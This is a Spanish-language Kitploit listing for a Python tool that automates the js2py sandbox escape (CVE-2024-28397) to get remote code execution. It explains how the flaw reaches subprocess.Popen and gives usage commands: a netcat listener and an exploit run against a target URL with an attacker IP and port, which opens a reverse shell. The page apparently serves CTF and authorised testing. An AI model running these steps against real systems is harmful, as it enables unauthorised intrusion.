Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-28397-Exploit-Automation — Un script de automatización en Python para explotar la vulnerabilidad **js2py Sandbox Escape** (CVE-2024-28397). Esta herramienta automatiza el proceso de generación y entrega de payloads para lograr Ejecución Remota de Código (RCE) en instancias vulnerables. | Kitploit
Herramientas/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebCTFAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

Un script de automatización en Python para explotar la vulnerabilidad **js2py Sandbox Escape** (CVE-2024-28397). Esta herramienta automatiza el proceso de generación y entrega de payloads para lograr Ejecución Remota de Código (RCE) en instancias vulnerables.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 9 mesesAún no revisado
Compartir

CVE-2024-28397 Automatización de Exploit

Un script de automatización en Python para explotar la vulnerabilidad js2py Sandbox Escape (CVE-2024-28397). Esta herramienta automatiza el proceso de generación y entrega de payloads para lograr Ejecución Remota de Código (RCE) en instancias vulnerables.

⚠️ Aviso Legal El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Este repositorio es solo con fines educativos. El autor no se hace responsable por cualquier mal uso de esta información. Esta herramienta está diseñada para ser utilizada en evaluaciones de seguridad autorizadas y entornos Capture The Flag (CTF).

🧐 Acerca de la Vulnerabilidad

CVE-2024-28397 afecta a la librería js2py (versiones < 0.74). La librería no logra aislar correctamente el entorno JavaScript del entorno Python del host.

  • La Falla: Una sanitización inadecuada de la entrada permite el acceso a los atributos internos __class__ y __subclasses__ de Python.
  • El Impacto: Un atacante puede recorrer la jerarquía de objetos para acceder a subprocess.Popen, lo que permite la ejecución de comandos arbitrarios en el servidor host.

🚀 Características

  • Generación Automatizada de Payloads: Construye automáticamente la lógica de escape del sandbox de JavaScript.
  • Codificación Base64: Maneja la codificación del payload para prevenir errores de sintaxis durante la transmisión.
  • Manejo de Conexiones: Detecta la ejecución exitosa del shell basándose en los timeouts de las solicitudes.
  • Salida Profesional: Interfaz CLI limpia con actualizaciones de estado.

🛠️ Uso

Prerrequisitos

root@kitploit:~
pip install requests

Inicia tu Netcat Listener :

root@kitploit:~
nc -lvnp 1337

Ejecuta el Script :

root@kitploit:~
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 Prueba de Concepto

Aquí está la herramienta en acción contra un objetivo vulnerable (Hack The Box - CodeTwo):

1. Ejecución

Ejecutando el exploit para generar el payload y activar el callback: crop3

2. Éxito

Recibiendo la reverse shell en el listener: Éxito de Reverse Shell

  • 📜 Créditos

  • Descubrimiento de Vulnerabilidad y Payload JS Principal: Marven11
  • Script de Automatización: L1337Xi
  • Colaboradores:
    • Leyn4L
    • iamrizwanvp
    • axai457
Descargar herramienta